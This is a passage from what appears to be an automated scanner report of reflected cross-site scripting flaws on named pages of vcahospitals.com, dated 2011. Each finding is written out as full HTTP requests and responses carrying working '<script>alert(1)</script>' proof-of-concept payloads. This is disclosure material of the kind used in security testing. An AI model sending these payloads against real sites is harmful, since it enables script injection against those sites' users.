GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EBe1c92"><script>alert(1)</script>166b7134f96 &ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d
%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:23 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=q7se0pt37ht32v8m7658nv8sm4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EBe1c92"><script>alert(1)</script>166b7134f96 &ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email...[SNIP]...
2.15. http://www.vcahospitals.com/hanson/offer.html [ipaddress parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5076b"><script>alert(1)</script>0fd887dd63 was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.2435076b"><script>alert(1)</script>0fd887dd63 &js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%
2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:27 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=2b7fn6e43qheokrevppr4nsb17; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19377 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... n" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.2435076b"><script>alert(1)</script>0fd887dd63 &js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%...[SNIP]...
2.16. http://www.vcahospitals.com/hanson/offer.html [js parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The value of the js request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b73"><script>alert(1)</script>c6690637939 was submitted in the js parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=f8b73"><script>alert(1)</script>c6690637939 &lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d
%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:31 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=lutm9p0j05v6cj6vrgj8qkh9p2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... ame="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=f8b73"><script>alert(1)</script>c6690637939 &lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHO...[SNIP]...
2.17. http://www.vcahospitals.com/hanson/offer.html [lname parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16722"><script>alert(1)</script>2ea3b2459e0 was submitted in the lname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=16722"><script>alert(1)</script>2ea3b2459e0 &newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d
%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:35 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=1o5ip8hjvq2ep4jaapvh990j72; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19421 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="lname" id="lname" type="text" size="30" class="req" maxlength="50" value="16722"><script>alert(1)</script>2ea3b2459e0 " />...[SNIP]...
2.18. http://www.vcahospitals.com/main/offer [ parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2cb5"><script>alert(1)</script>58d69b46a2b was submitted in the parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?=3d2cb5"><script>alert(1)</script>58d69b46a2b &state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:52 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3d2cb5"><script>alert(1)</script>58d69b46a2b &state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.19. http://www.vcahospitals.com/main/offer [&optin parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the &optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98fd8"><script>alert(1)</script>96e4964cd43 was submitted in the &optin parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?&optin=98fd8"><script>alert(1)</script>96e4964cd43 &guid=207E973A-7104-40BA-9D0B-1AC946469C69&addr=&city=&date=1307084400&email=&fname=&formtype=CORP&ipaddress=173.193.214.243&lname=&newmex=0&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f%26optin%3d%26guid%3d7FB081CC-4889-473B-8B55-80F871DF3718%26addr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3df59533da00809808fd0e36c2845bf10f%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d1%2526guid%253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=3459b82500bdac55498a24f3778782f7&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f%26optin%3d%26guid%3d1E049255-7B8D-4495-83A3-703E71767F97%26addr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d1%2526guid%253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3db7ecd3da55c240fe68509bf0409ab225%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d%2526guid%253d7FB081CC-4889-473B-8B55-80F871DF3718%2526addr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newme
x%253d0%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253df59533da00809808fd0e36c2845bf10f%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253f%252526optin%25253d1%252526guid%25253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com Cookie: PHPSESSID=7dralunqm62g71gllr4tjahje0
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&optin=98fd8"><script>alert(1)</script>96e4964cd43 &guid=207E973A-7104-40BA-9D0B-1AC946469C69&addr=&city=&date=1307084400&email=&fname=&formtype=CORP&ipaddress=173.193.214.243&lname=&newmex=0&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fw...[SNIP]...
2.20. http://www.vcahospitals.com/main/offer [&state parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the &state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0508"><script>alert(1)</script>c935fdcf07e was submitted in the &state parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?&state=FLf0508"><script>alert(1)</script>c935fdcf07e &guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:05 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FLf0508"><script>alert(1)</script>c935fdcf07e &guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.21. http://www.vcahospitals.com/main/offer [addr parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4e30"><script>alert(1)</script>0f7c5167de6 was submitted in the addr parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
